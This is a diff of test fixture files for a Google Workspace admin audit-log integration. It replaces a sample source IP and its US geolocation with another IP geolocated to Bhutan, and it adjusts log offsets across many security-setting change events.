@@ -525,26 +489,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 4434, + "log.offset": 4425, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -566,7 +526,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -583,26 +543,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 4963, + "log.offset": 4953, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -624,7 +580,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -640,26 +596,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 5481,
+ "log.offset": 5470,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -680,7 +632,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -692,26 +644,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 6010,
+ "log.offset": 5998,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -732,7 +680,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -745,26 +693,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 6385,
+ "log.offset": 6372,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -785,7 +729,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -801,26 +745,22 @@
 "google_workspace.organization.domain": "elastic.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 6802,
+ "log.offset": 6788,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -841,7 +781,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -853,26 +793,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 7356,
+ "log.offset": 7341,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -893,7 +829,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -905,26 +841,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 7746,
+ "log.offset": 7730,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -946,7 +878,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -963,26 +895,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 8134,
+ "log.offset": 8117,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1004,7 +932,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENFORCE_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1023,26 +951,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 8652,
+ "log.offset": 8634,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1064,7 +988,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1078,26 +1002,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 9247,
+ "log.offset": 9228,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1119,7 +1039,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -1136,26 +1056,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 9718,
+ "log.offset": 9698,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
